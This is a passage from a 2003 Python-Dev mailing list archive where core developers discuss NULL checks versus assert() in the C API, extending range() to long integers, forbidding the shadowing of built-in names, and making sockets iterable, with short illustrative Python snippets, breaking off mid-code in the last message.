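hypothetical helper name, not the code from the application patches.

```python
def range_with_base(start, stop, step=1):
    """Hypothetical helper: build the list from small offsets, then add the base back."""
    offsets = range(0, stop - start, step)   # only small values reach range()
    return [start + off for off in offsets]


big = 10 ** 21
values = range_with_base(big, big + 10, 3)
```

Only the difference between the endpoints is passed to range(), so the
magnitude of the endpoints themselves no longer matters.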

Fixing range was relatively easy, and could be done with no performance
penalty (the code to handle long ranges is only invoked after the
existing code path fails; the common case is unaltered).  Fixing
xrange() is trickier, and I'm opting to maintain backwards compatibility
as much as possible.

In any case, I should have the patch ready to submit within the next
week or so (just a few hours more work is needed, for testing and
cleanup)

Then the argument about whether it should ever be included can begin in
earnest.  But I have seen enough examples of people being surprised that
ranges of long values fail (where the range length is well within the
addressable limit, but the range values must be PyLongs) that I think at
least range() should be fixed.  And if range() is fixed, then sadly,
xrange() should be fixed as well (IMO).

BTW, I'm all for deprecating xrange() with all deliberate speed.  Doing
so would only make updating range behavior easier.

Chad


From jeremy@zope.com  Thu Mar 13 20:35:45 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 13 Mar 2003 15:35:45 -0500
Subject: [Python-Dev] are NULL checks in Objects/abstract.c
 reallyneeded?
In-Reply-To: <002d01c2e99d$5fd188a0$3c10a044@oemcomputer>
References: <20030313133609.GA23223@foof.i3.cz>
 <200303131429.h2DETem03635@odiug.zope.com>
 <007d01c2e994$ddb73c00$3c10a044@oemcomputer>
 <1047585663.4296.2.camel@slothrop.zope.com>
 <002d01c2e99d$5fd188a0$3c10a044@oemcomputer>
Message-ID: <1047587745.4296.8.camel@slothrop.zope.com>

On Thu, 2003-03-13 at 15:16, Raymond Hettinger wrote:
> > > Can we get most of the same benefit by using 
> > > an assert() rather than NULL-->SystemError?
> > 
> > No.  assert() causes the program to fail.  SystemError() raises an
> > exception and lets the program keep going.  Those are vastly different
> > effects.
> 
> Of course.  My thought was that either one will come to the
> attention of the extension writer before the extension goes out.
> But then, if the code in question never got exercised, then it
> would crash in the hands of a user.

That's right.  We should expect that some number of bugs in extension
code are going to be found by end users.  An end user is better able to
cope with a SystemError than a core file.

Long running servers have a different reason to prefer SystemError.  A
Zope process allows untrusted code to call some extension module,
believing it is safe.  A bug is found in the extension.  If the bug
tickles an assert(), Zope crashes.  If the bug raises an exception, Zope
catches it and continues.
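
A rough Python-level sketch of the difference described above. The
function extension_call is a hypothetical stand-in for a C API routine
that guards against NULL (modelled here as None), and serve is a toy
request loop, not Zope code.

```python
def extension_call(obj):
    """Stand-in for a C API function that checks its argument for NULL."""
    if obj is None:
        raise SystemError("null argument to internal routine")
    return len(obj)


def serve(requests):
    """Handle every request; a buggy call is reported instead of ending the loop."""
    results = []
    for req in requests:
        try:
            results.append(extension_call(req))
        except SystemError as exc:
            results.append("error: %s" % exc)
    return results


outcome = serve(["abc", None, [1, 2]])
```

The request after the faulty one is still served, which is the property
a long-running process relies on.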

> Raymond Hettinger
> 
> #################################################################
> #################################################################
> #################################################################
> #####
> #####
> #####
> #################################################################
> #################################################################
> #################################################################

Your funky sig is back :-).

Jeremy


From skip@pobox.com  Thu Mar 13 20:50:36 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 13 Mar 2003 14:50:36 -0600
Subject: [Python-Dev] are NULL checks in Objects/abstract.c reallyneeded?
In-Reply-To: <002d01c2e99d$5fd188a0$3c10a044@oemcomputer>
References: <20030313133609.GA23223@foof.i3.cz>
 <200303131429.h2DETem03635@odiug.zope.com>
 <007d01c2e994$ddb73c00$3c10a044@oemcomputer>
 <1047585663.4296.2.camel@slothrop.zope.com>
 <002d01c2e99d$5fd188a0$3c10a044@oemcomputer>
Message-ID: <15984.61212.224414.818876@montanaro.dyndns.org>

    Raymond> Can we get most of the same benefit by using an assert() rather
    Raymond> than NULL-->SystemError?

    Jeremy> No.  assert() causes the program to fail.  SystemError() raises
    Jeremy> an exception and lets the program keep going.  Those are vastly
    Jeremy> different effects.

It's not clear to me that you'd see any benefit anyway.  The checking code
currently looks like this:

    if (o == NULL)
        return null_error();

If you changed it to use assert you'd have

    assert(o != NULL);

which expands to

    ((o != NULL) ? 0 : __assert(...));

In the common case you still test for either o==NULL or o!=NULL.  Unless one
test is terrifically faster than the other (and you executed it a helluva
lot) you wouldn't gain anything except the loss of the possibility (however
slim) that you might be able to recover.

Still, for people whose only desire is speed and are willing to sacrifice
checks to get it, perhaps we should have a --without-null-checks configure
flag. ;-)  I bet if you were ruthless in eliminating checks (especially in
ceval.c) you would see an easily measurable speedup.

Skip


From tim.one@comcast.net  Thu Mar 13 21:20:52 2003
From: tim.one@comcast.net (Tim Peters)
Date: Thu, 13 Mar 2003 16:20:52 -0500
Subject: [Python-Dev] are NULL checks in Objects/abstract.c reallyneeded?
In-Reply-To: <15984.61212.224414.818876@montanaro.dyndns.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEFAEBAB.tim.one@comcast.net>

[Skip Montanaro]
> It's not clear to me that you'd see any benefit anyway.  The checking code
> currently looks like this:
>
>     if (o == NULL)
>         return null_error();
>
> If you changed it to use assert you'd have
>
>     assert(o != NULL);
>
> which expands to
>
>     ((o != NULL) ? 0 : __assert(...));
> ...

In the release build, Python arranges to #define the preprocessor NDEBUG
symbol, which in turn causes assert() to expand to nothing (or maybe to
(void)0, or something like that, depending on the compiler).  That's
standard ANSI C behavior for assert().  IOW, asserts cost nothing in a
release build -- and don't do anything in a release build either.
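
Python's own assert statement behaves analogously, which gives a way to
sketch the effect without a C compiler. This is an analogy only, not the
C mechanism itself: the example assumes Python 3, where compile()
accepts an optimize argument, and level 1 plays the role of NDEBUG.

```python
source = "assert value is not None, 'NULL passed'\nresult = 'ran past the check'"


def run(optimize):
    """Compile and run the snippet at the given optimization level."""
    namespace = {"value": None}
    try:
        exec(compile(source, "<sketch>", "exec", optimize=optimize), namespace)
    except AssertionError as exc:
        return "assertion failed: %s" % exc
    return namespace["result"]


debug_build = run(0)     # asserts are kept and the check fires
release_build = run(1)   # asserts are compiled away; the check costs and does nothing
```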


From greg@cosc.canterbury.ac.nz  Thu Mar 13 21:37:46 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 14 Mar 2003 10:37:46 +1300 (NZDT)
Subject: [Python-Dev] Re: More int/long integration issues
In-Reply-To: <200303131903.h2DJ3Ug06240@odiug.zope.com>
Message-ID: <200303132137.h2DLbkf06569@oma.cosc.canterbury.ac.nz>

Guido mused:

> and that there's no definition of range other than the built-in one
> (this requires a subtle change of language rules); it can then
> substitute an internal equivalent to xrange().

That sounds good. What sort of subtle language change
do you have in mind which would permit this deduction?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From skip@pobox.com  Thu Mar 13 21:46:54 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 13 Mar 2003 15:46:54 -0600
Subject: [Python-Dev] are NULL checks in Objects/abstract.c reallyneeded?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEFAEBAB.tim.one@comcast.net>
References: <15984.61212.224414.818876@montanaro.dyndns.org>
 <LNBBLJKPBEHFEDALKOLCOEFAEBAB.tim.one@comcast.net>
Message-ID: <15984.64590.983479.795437@montanaro.dyndns.org>

    Tim> In the release build, Python arranges to #define the preprocessor
    Tim> NDEBUG symbol, which in turn causes assert() to expand to nothing

Yeah, I forgot about that.  Okay, so the analysis was flawed.  You didn't
comment on the --without-null-checks option. ;-)

Skip


From guido@python.org  Fri Mar 14 00:22:09 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 13 Mar 2003 19:22:09 -0500
Subject: [Python-Dev] Re: More int/long integration issues
In-Reply-To: "Your message of Fri, 14 Mar 2003 10:37:46 +1300."
 <200303132137.h2DLbkf06569@oma.cosc.canterbury.ac.nz>
References: <200303132137.h2DLbkf06569@oma.cosc.canterbury.ac.nz>
Message-ID: <200303140022.h2E0M9400393@pcp02138704pcs.reston01.va.comcast.net>

> > and that there's no definition of range other than the built-in one
> > (this requires a subtle change of language rules); it can then
> > substitute an internal equivalent to xrange().
> 
> That sounds good. What sort of subtle language change
> do you have in mind which would permit this deduction?

An official prohibition on inserting names in other namespaces that
shadow built-ins.  The prohibition needn't be enforced (although that
would be nice).  A program that does

  import foomod
  foomod.range = ...

would be invalid, but an implementation might not be able to catch all
cases, e.g.

  import foomod
  foomod.__dict__['range'] = ...

It could be enforced, mostly, by making a module's __dict__ attribute
return a read-only proxy like a new-style class's __dict__ attribute
does, and putting an explicit ban on setting certain names in the
module setattr implementation.  But the module itself could also play
games, e.g. it could do

  exec "range = ..." in globals()

Another module could also do

  from foomod import f # a function
  f.func_globals['range'] = ...

All these things would be illegal without necessarily being enforced.
(The only way I see for total enforcement would be to change the dict
implementation to trap certain assignments.)

BTW,

  import foomod
  foomod.foo = ...

would still be allowed -- it's only setting previously unset built-in
names (or maybe built-in names that are known to be used by the
module) that would be prohibited.

Also, foomod could explicitly allow setting an attribute by doing
something like

  range = range # copy the built-in into a global

to disable the optimization.  I.e. setting something that's already
set should always be allowed.
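
The cases above can be reproduced in a small sketch, assuming Python 3
(where the built-in namespace is the builtins module). The module object
is built in memory with types.ModuleType; foomod and count are
hypothetical names. It shows why a compiler cannot simply assume that
range means the built-in under the current rules.

```python
import builtins
import types

foomod = types.ModuleType("foomod")          # hypothetical module, built in memory
exec("def count(n):\n    return list(range(n))", foomod.__dict__)

before = foomod.count(3)                      # name lookup reaches the built-in range

# Another module inserts a global that shadows the built-in.
foomod.range = lambda n: ["shadowed"] * n
after = foomod.count(3)                       # same function, different range

# Copying the built-in into a global: the name is set, with the original meaning.
foomod.range = builtins.range
restored = foomod.count(3)
```

The function body never changes, yet its result depends on what other
code has stored in the module's namespace.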

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@comcast.net  Fri Mar 14 01:12:01 2003
From: tim.one@comcast.net (Tim Peters)
Date: Thu, 13 Mar 2003 20:12:01 -0500
Subject: [Python-Dev] are NULL checks in Objects/abstract.c reallyneeded?
In-Reply-To: <15984.64590.983479.795437@montanaro.dyndns.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEANEBAB.tim.one@comcast.net>

[Skip Montanaro]
> ...
> You didn't comment on the --without-null-checks option. ;-)

That's true!

agreeably y'rs  - tim


From andrewm@object-craft.com.au  Fri Mar 14 01:47:55 2003
From: andrewm@object-craft.com.au (Andrew McNamara)
Date: Fri, 14 Mar 2003 12:47:55 +1100
Subject: [Python-Dev] Iterable sockets?
Message-ID: <20030314014755.BE3AB3CC5F@coffee.object-craft.com.au>

Line oriented network protocols are very common, and I often find myself
calling the socket makefile method so I can read complete lines from a
socket. I'm probably not the first one who's wished that socket objects
were more file-like.

While I don't think we'd want to go as far as to turn them into a stdio
based file object, it might make sense to allow them to be iterated over
(and add a .readline() method, I guess). This would necessitate adding some
input buffering, which will complicate things like the .recv() method, so
I'm not sure it's that good an idea, but it removes one gotcha for
neophytes (and forgetful veterans). Thoughts?

-- 
Andrew McNamara, Senior Developer, Object Craft
http://www.object-craft.com.au/


From guido@python.org  Fri Mar 14 01:57:00 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 13 Mar 2003 20:57:00 -0500
Subject: [Python-Dev] Iterable sockets?
In-Reply-To: "Your message of Fri, 14 Mar 2003 12:47:55 +1100."
 <20030314014755.BE3AB3CC5F@coffee.object-craft.com.au>
References: <20030314014755.BE3AB3CC5F@coffee.object-craft.com.au>
Message-ID: <200303140157.h2E1v0i00939@pcp02138704pcs.reston01.va.comcast.net>

> Line oriented network protocols are very common, and I often find myself
> calling the socket makefile method so I can read complete lines from a
> socket. I'm probably not the first one who's wished that socket objects
> were more file-like.
> 
> While I don't think we'd want to go as far as to turn them into a stdio
> based file object, it might make sense to allow them to be iterated over
> (and add a .readline() method, I guess). This would necessitate adding some
> input buffering, which will complicate things like the .recv() method, so
> I'm not sure it's that good an idea, but it removes one gotcha for
> neophytes (and forgetful veterans). Thoughts?

Um, why doesn't the makefile() method do what you want?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From andrewm@object-craft.com.au  Fri Mar 14 02:38:00 2003
From: andrewm@object-craft.com.au (Andrew McNamara)
Date: Fri, 14 Mar 2003 13:38:00 +1100
Subject: [Python-Dev] Iterable sockets?
In-Reply-To: Message from Guido van Rossum <guido@python.org>
 of "Thu, 13 Mar 2003 20:57:00 CDT." <200303140157.h2E1v0i00939@pcp02138704pcs.reston01.va.comcast.net>
References: <20030314014755.BE3AB3CC5F@coffee.object-craft.com.au>  <200303140157.h2E1v0i00939@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030314023800.7BA6D3CC5F@coffee.object-craft.com.au>

>> Line oriented network protocols are very common, and I often find myself
>> calling the socket makefile method so I can read complete lines from a
>> socket. I'm probably not the first one who's wished that socket objects
>> were more file-like.
>> 
>> While I don't think we'd want to go as far as to turn them into a stdio
>> based file object, it might make sense to allow them to be iterated over
>> (and add a .readline() method, I guess). This would necessitate adding some
>> input buffering, which will complicate things like the .recv() method, so
>> I'm not sure it's that good an idea, but it removes one gotcha for
>> neophytes (and forgetful veterans). Thoughts?
>
>Um, why doesn't the makefile() method do what you want?

The short answer is that it does, but not very tidily - by turning the
socket object into a file object, I lose the original socket object
functionality (for example, shutdown()).

At another level, the concept of a "file-like" object is a very common
python idiom - socket is the odd one out these days.

It's really not a big deal - we could regularise the interface at the
cost of more implementation complexity.

-- 
Andrew McNamara, Senior Developer, Object Craft
http://www.object-craft.com.au/


From guido@python.org  Fri Mar 14 02:53:03 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 13 Mar 2003 21:53:03 -0500
Subject: [Python-Dev] More int/long integration issues
In-Reply-To: "Your message of 13 Mar 2003 12:25:17 PST."
 <1047587117.660.33.camel@sayge.arc.nasa.gov>
References: <ur89b1bc4.fsf@boost-consulting.com>
 <20030313164247.GB22296@panix.com> <1047587117.660.33.camel@sayge.arc.nasa.gov>
Message-ID: <200303140253.h2E2r3o01163@pcp02138704pcs.reston01.va.comcast.net>

> I'm working on a patch that allows both range() and xrange() to work
> with large (PyLong) values.

I'm not interested for xrange().  As I said, xrange() is a crutch and
should not be given features that make it hard to kill.

For range(), sure, upload to SF.

> I noticed the need for at least supporting long values when I found some
> bugs in code that did things like:
> 
> a = 1/1e-5
> range( a-20, a)

This should be a TypeError.  I'm sorry it isn't.  range() is only
defined for ints, and unfortunately if you pass it a float it
truncates rather than failing.

> or
> 
> a = 1/1e-6
> b = 1/1e-5
> c = 1/1e-4
> range(a, b, c)

Ditto.

(BTW why don't you write this as 1e6, 1e5, 1e4???)

> Now, this example is hardcoded, but in graphing software, or other
> numerical work, the actual values come from the data set.  All of a
> sudden, you could be dealing with very small numbers (say, because you
> want to examine error values), and you get:
> 
> a = 1/1e-21
> b = 1/1e-20
> c = 1/1e-19
> range(a, b, c)
> 
> And your piece of code now fails.  By the comments I've seen, this
> failure tends to come as a big surprise (people are simply expecting
> range to be able to work with PyLong values, over short lengths).

But 1/1e-21 is not a long.  It's a float.  You're flirting with
disaster here.
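
The distinction can be checked directly. The sketch below assumes a
Python 3 interpreter, where range() rejects floats with a TypeError
instead of truncating them, and where large integers are handled
exactly.

```python
a = 1 / 1e-21
kind = type(a).__name__            # a float, even though the value looks whole

try:
    range(a)
    outcome = "accepted"
except TypeError:
    outcome = "TypeError"

# Integer arithmetic keeps the values exact, however large they are.
start = 10 ** 21
values = list(range(start, start + 3))
```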

> Also, someone who is working with large files (> C long on his machine)
> claimed to be having problems w/ xrange() failing (although, if he is
> indexing the xrange object, my patch can't help anyway)

That's a totally different problem.  Indeed you can't use xrange()
with values > sys.maxint.  But it should be easy to recode this
without xrange.

> I've seen enough people asking in the newsgroups about this behavior (at
> least four in the past 5 months or so), and I've submitted some
> application patches to make things work for these cases (ie. by
> explicitly subtracting out the large common base of each parameter, and
> adding it back in after the list is generated), so I decided to make a
> patch to change the range behavior.
> 
> Fixing range was relatively easy, and could be done with no performance
> penalty (the code to handle long ranges is only invoked after the
> existing code path fails; the common case is unaltered).  Fixing
> xrange() is trickier, and I'm opting to maintain backwards compatibility
> as much as possible.
> 
> In any case, I should have the patch ready to submit within the next
> week or so (just a few hours more work is needed, for testing and
> cleanup)
> 
> Then the argument about whether it should ever be included can begin in
> earnest.  But I have seen enough examples of people being surprised that
> ranges of long values fail (where the range length is well within the
> addressable limit, but the range values must be PyLongs) that I think at
> least range() should be fixed.

Yes.

> And if range() is fixed, then sadly,
> xrange() should be fixed as well (IMO).

No.

> BTW, I'm all for deprecating xrange() with all deliberate speed.  Doing
> so would only make updating range behavior easier.

It can't be deprecated until we have an alternative.  That will have
to wait until Python 2.4.  I fought its addition to the language long
and hard, but the arguments from PBP (Practicality Beats Purity) were
too strong.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Fri Mar 14 02:56:42 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 13 Mar 2003 21:56:42 -0500
Subject: [Python-Dev] Iterable sockets?
In-Reply-To: "Your message of Fri, 14 Mar 2003 13:38:00 +1100."
 <20030314023800.7BA6D3CC5F@coffee.object-craft.com.au>
References: <20030314014755.BE3AB3CC5F@coffee.object-craft.com.au>
 <200303140157.h2E1v0i00939@pcp02138704pcs.reston01.va.comcast.net>
 <20030314023800.7BA6D3CC5F@coffee.object-craft.com.au>
Message-ID: <200303140256.h2E2ugI01187@pcp02138704pcs.reston01.va.comcast.net>

> >> Line oriented network protocols are very common, and I often find
> >> myself calling the socket makefile method so I can read complete
> >> lines from a socket. I'm probably not the first one who's wished
> >> that socket objects were more file-like.
> >> 
> >> While I don't think we'd want to go as far as to turn them into a
> >> stdio based file object, it might make sense to allow them to be
> >> iterated over (and add a .readline() method, I guess). This would
> >> necessitate adding some input buffering, which will complicate
> >> things like the .recv() method, so I'm not sure it's that good an
> >> idea, but it removes one gotcha for neophytes (and forgetful
> >> veterans). Thoughts?
> >
> >Um, why doesn't the makefile() method do what you want?
> 
> The short answer is that it does, but not very tidily - by turning the
> socket object into a file object, I lose the original socket object
> functionality (for example, shutdown()).

You can just keep the socket around though.
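
A minimal sketch of keeping both objects, assuming Python 3 and a
platform that provides socket.socketpair(). The connected pair and the
protocol lines are for demonstration only.

```python
import socket

client, server = socket.socketpair()        # connected pair, demonstration only

client.sendall(b"HELO example\r\nQUIT\r\n")
client.shutdown(socket.SHUT_WR)              # half-close: client will send no more

reader = server.makefile("rb")               # file-like view used for line reads
lines = [line.rstrip(b"\r\n") for line in reader]

server.sendall(b"bye\n")                     # the socket object is still usable
reply = client.recv(16)

reader.close()
client.close()
server.close()
```

The file object handles line reading, while shutdown() and the raw
send/receive calls stay on the socket that was kept around.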

> At another level, the concept of a "file-like" object is a very common
> python idiom - socket is the odd one out these days.
> 
> It's really not a big deal - we could regularise the interface at the
> cost of more implementation complexity.

I'm not sure if I'd call that regularizing.  It would by necessity
become some kind of odd mixture.  In any case, I find the file
abstraction a bit arcane too.  Maybe we should strive to replace all
these with something better in Python 3.0, to be prototyped in the
standard library starting with 2.4.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com  Fri Mar 14 03:03:58 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 13 Mar 2003 21:03:58 -0600
Subject: [Python-Dev] Iterable sockets?
In-Reply-To: <20030314023800.7BA6D3CC5F@coffee.object-craft.com.au>
References: <20030314014755.BE3AB3CC5F@coffee.object-craft.com.au>
 <200303140157.h2E1v0i00939@pcp02138704pcs.reston01.va.comcast.net>
 <20030314023800.7BA6D3CC5F@coffee.object-craft.com.au>
Message-ID: <15985.18078.155484.648103@montanaro.dyndns.org>

    >> Um, why doesn't the makefile() method do what you want?

    Andrew> The short answer is that it does, but not very tidily - by
    Andrew> turning the socket object into a file object, I lose the
    Andrew> original socket object functionality (for example, shutdown()).

Would it be sufficient for the close() method on the object returned by
sock.makefile() to call shutdown(2) on the underlying socket?

Skip


From andrewm@object-craft.com.au  Fri Mar 14 03:11:41 2003
From: andrewm@object-craft.com.au (Andrew McNamara)
Date: Fri, 14 Mar 2003 14:11:41 +1100
Subject: [Python-Dev] Iterable sockets?
In-Reply-To: Message from Guido van Rossum <guido@python.org>
 of "Thu, 13 Mar 2003 21:56:42 CDT." <200303140256.h2E2ugI01187@pcp02138704pcs.reston01.va.comcast.net>
References: <20030314014755.BE3AB3CC5F@coffee.object-craft.com.au> <200303140157.h2E1v0i00939@pcp02138704pcs.reston01.va.comcast.net> <20030314023800.7BA6D3CC5F@coffee.object-craft.com.au>  <200303140256.h2E2ugI01187@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030314031141.E468A3CC5F@coffee.object-craft.com.au>

>> The short answer is that it does, but not very tidily - by turning the
>> socket object into a file object, I lose the original socket object
>> functionality (for example, shutdown()).
>
>You can just keep the socket around though.

Yes. Which has always struck me as slightly ugly.
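
A minimal sketch of the "keep the socket around" approach, written for
present-day Python 3 rather than the interpreter under discussion.
socket.socketpair() stands in for a real connection, and the function
name and protocol lines are made up for illustration.

```python
import socket

def read_lines_keeping_socket():
    # socketpair() stands in for a real client/server connection.
    client, server = socket.socketpair()
    try:
        client.sendall(b"HELO example\r\nQUIT\r\n")
        # shutdown() exists only on the socket object, not on the file
        # object, so the original socket has to stay within reach.
        client.shutdown(socket.SHUT_WR)

        # makefile() gives a buffered, iterable view of the other end.
        reader = server.makefile("rb")
        try:
            return [line.rstrip(b"\r\n") for line in reader]
        finally:
            reader.close()
    finally:
        client.close()
        server.close()
```

The file object handles line splitting, while anything socket-specific
still goes through the socket itself.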

>> At another level, the concept of a "file-like" object is a very common
>> python idiom - socket is the odd one out these days.
>> 
>> It's really not a big deal - we could regularise the interface at the
>> cost of more implementation complexity.
>
>I'm not sure if I'd call that regularizing.  It would by necessity
>become some kind of odd mixture.

I guess you would keep the send() and recv() interfaces for raw access, and
add read(), write(), readlines(), etc, which would be buffered. I'd choose
to then view it as a superset of a file-like object.

>In any case, I find the file abstraction a bit arcane too.  Maybe we
>should strive to replace all these with something better in Python 3.0, to
>be prototyped in the standard library starting with 2.4.

And get rid of stdio along the way, with any luck... 8-)

It would also be nice to make the buffering play nicely with
select()/poll()-threaded applications... if we're talking about
wishlists... 8-)

-- 
Andrew McNamara, Senior Developer, Object Craft
http://www.object-craft.com.au/


From greg@cosc.canterbury.ac.nz  Fri Mar 14 03:26:19 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 14 Mar 2003 16:26:19 +1300 (NZDT)
Subject: [Python-Dev] Iterable sockets?
In-Reply-To: <15985.18078.155484.648103@montanaro.dyndns.org>
Message-ID: <200303140326.h2E3QJZ07822@oma.cosc.canterbury.ac.nz>

Skip Montanaro <skip@pobox.com>:

> Would it be sufficient for the close() method on the object returned by
> sock.makefile() to call shutdown(2) on the underlying socket?

I don't think that would be very useful - shutdown() is
normally used to shut the socket down in one direction only.
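
A small sketch of that one-direction use, assuming modern Python 3 and
using socket.socketpair() in place of a real connection. The helper
names are hypothetical.

```python
import socket

def recv_until_eof(sock):
    # Read until the peer has shut down its sending side.
    chunks = []
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            break
        chunks.append(chunk)
    return b"".join(chunks)

def half_close_demo():
    client, server = socket.socketpair()
    try:
        client.sendall(b"request")
        # Close only the client->server direction; the client can
        # still receive the reply afterwards.
        client.shutdown(socket.SHUT_WR)

        request = recv_until_eof(server)
        server.sendall(b"reply to " + request)
        server.shutdown(socket.SHUT_WR)

        reply = recv_until_eof(client)
        return request, reply
    finally:
        client.close()
        server.close()
```

A close() on the file object that implied a full shutdown would take
away exactly this half-open state.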

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From cnetzer@mail.arc.nasa.gov  Fri Mar 14 03:52:15 2003
From: cnetzer@mail.arc.nasa.gov (Chad Netzer)
Date: 13 Mar 2003 19:52:15 -0800
Subject: [Python-Dev] More int/long integration issues
In-Reply-To: <200303140253.h2E2r3o01163@pcp02138704pcs.reston01.va.comcast.net>
References: <ur89b1bc4.fsf@boost-consulting.com>
 <20030313164247.GB22296@panix.com>
 <1047587117.660.33.camel@sayge.arc.nasa.gov>
 <200303140253.h2E2r3o01163@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <1047613935.661.119.camel@sayge.arc.nasa.gov>

On Thu, 2003-03-13 at 18:53, Guido van Rossum wrote:

> > a = 1/1e-5
> > range( a-20, a)
> 
> This should be a TypeError.  I'm sorry it isn't.

Yeah.  I can easily make it do this, BTW.  (ie. keep it backwards
compatible for smaller floats, but disallow it when dealing with PyLong
size floats).  With large floats, the implicit conversion to PyLong gets
even less sensible, due to granularity issues.

> > a = 1/1e-6
> > b = 1/1e-5
> > c = 1/1e-4
> > range(a, b, c)
> 
> Ditto.
> 
> (BTW why don't you write this as 1e6, 1e5, 1e4???)

Just emphasizing that the coders may not have even expected to be
dealing with such "large" values, but they got them anyway because they
were plotting very "small" values (and the plotting operation did the
inversion).  A bad choice of example, I guess.

Okay, I decided to go look at the specific code I was talking about.  It
essentially did stuff like:

large_float = 1e20
a = long( math.ceil( large_float ) )
b = a + 10
range( a, b )

So, it actually wasn't submitting floats to range(), but was expecting
it to work on long values (within the limits of memory).  Again, it is
also easy to fix these uses, but we agree that in principle it
should work...
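
For comparison, a sketch of how this pattern behaves in modern
Python 3, where int and long are a single type. This is an assumption
about today's interpreter, not a description of the patch being
discussed; the function name is made up.

```python
import math

def range_checks():
    large_float = 1e20
    a = int(math.ceil(large_float))   # an arbitrary-precision int
    b = a + 10
    values = list(range(a, b))        # works for values beyond 2**63

    # Passing floats directly is rejected instead of being truncated.
    try:
        range(large_float - 20, large_float)
    except TypeError:
        float_rejected = True
    else:
        float_rejected = False
    return values, float_rejected
```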

I've heard others doing number theory work, who hoped or expected it to
work, as well.  (Typically, they wanted to use HUGE step sizes, for
example)

In any case, I'll get the patch submitted fairly soon, for range(). 
Need to update the tests.

> But 1/1e-21 is not a long.  It's a float.  You're flirting with
> disaster here.

Yep. I agree.

> > And if range() is fixed, then sadly,
> > xrange() should be fixed as well (IMO).
> 
> No.

Alright.  That makes things (fairly) easy. :)

> > BTW, I'm all for deprecating xrange() with all deliberate speed.  Doing
> > so would only make updating range behavior easier.
> 
> It can't be deprecated until we have an alternative.  That will have
> to wait until Python 2.4.

I'm also coding an irange() for consideration in the itertools module.
At least an (explicit) replacement for the iteration usage (although,
maybe not necessary if you actually do the lazy-list in "for" loop
change.)  If people need the indexing and length operations, too, I can
only suggest a pure python implementation (which could return an
irange() iterator when needed).  Is that a dead-end idea, or a starter?
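
A rough pure-Python sketch of what such an irange() could look like,
written as a generator in modern Python 3. The signature mirrors
range(), which is an assumption; nothing here is the proposed
itertools code.

```python
def irange(start, stop=None, step=1):
    """Lazily yield start, start+step, ... without building a list."""
    if stop is None:
        # irange(n) behaves like irange(0, n)
        start, stop = 0, start
    if step == 0:
        raise ValueError("irange() step must not be zero")
    value = start
    while (step > 0 and value < stop) or (step < 0 and value > stop):
        yield value
        value += step
```

Because it only ever holds one value at a time, it supports iteration
but not indexing or len(), which matches the split described above.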


Chad Netzer


From aleax@aleax.it  Fri Mar 14 07:44:12 2003
From: aleax@aleax.it (Alex Martelli)
Date: Fri, 14 Mar 2003 08:44:12 +0100
Subject: [Python-Dev] Iterable sockets?
In-Reply-To: <20030314014755.BE3AB3CC5F@coffee.object-craft.com.au>
References: <20030314014755.BE3AB3CC5F@coffee.object-craft.com.au>
Message-ID: <200303140844.12401.aleax@aleax.it>

On Friday 14 March 2003 02:47 am, Andrew McNamara wrote:
> Line oriented network protocols are very common, and I often find myself
> calling the socket makefile method so I can read complete lines from a
> socket. I'm probably not the first one who's wished that socket objects
> were more file-like.
>
> While I don't think we'd want to go as far as to turn them into a stdio
> based file object, it might make sense to allow them to be iterated over
> (and add a .readline() method, I guess). This would necessitate adding some
> input buffering, which will complicate things like the .recv() method, so
> I'm not sure it's that good an idea, but it removes one gotcha for
> neophytes (and forgetful veterans). Thoughts?

I've had occasion to code a "socket that turns into a filelike object at
need" (back in Python 2.0, I believe) and I used something like (can't
find the original code, but AFAIR it was a bit like the following):


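import socket

class richsocket:

    def __init__(self, *args):
        # Create the underlying socket; the file object is made lazily.
        self.sock = socket.socket(*args)
        self.file = None

    def __getattr__(self, name):
        # Only called for names not found on the wrapper itself:
        # try the socket first, then fall back to the file object.
        try: result = getattr(self.sock, name)
        except AttributeError: pass
        else: return result

        if self.file is None: self.file = self.sock.makefile()
        return getattr(self.file, name)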


This has some issues (e.g. method close goes to self.sock when it
should probably go to self.file if not None; plus, the buffering issues
you mention, etc), but nothing that looks too hard to fix -- in my use
case I applied AGNI and never needed any more than this simple
and smooth "double alternate delegation" pattern.  Today, if type
socket supports inheritance (haven't checked), it should be even 
easier, I suspect.
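
One possible way to address the close() issue, sketched for modern
Python 3. The class wraps an existing socket instead of creating one,
and the names RichSocket and rich_socket_demo are hypothetical; this is
not the original code.

```python
import socket

class RichSocket:
    def __init__(self, sock):
        self.sock = sock
        self.file = None

    def close(self):
        # Close the file object first (if one was created), then the
        # socket, so buffered data is flushed before the socket goes.
        if self.file is not None:
            self.file.close()
            self.file = None
        self.sock.close()

    def __getattr__(self, name):
        # Socket attributes win; anything else goes to the file object.
        try:
            return getattr(self.sock, name)
        except AttributeError:
            pass
        if self.file is None:
            self.file = self.sock.makefile("rwb")
        return getattr(self.file, name)

def rich_socket_demo():
    peer, raw = socket.socketpair()   # stand-in for a real connection
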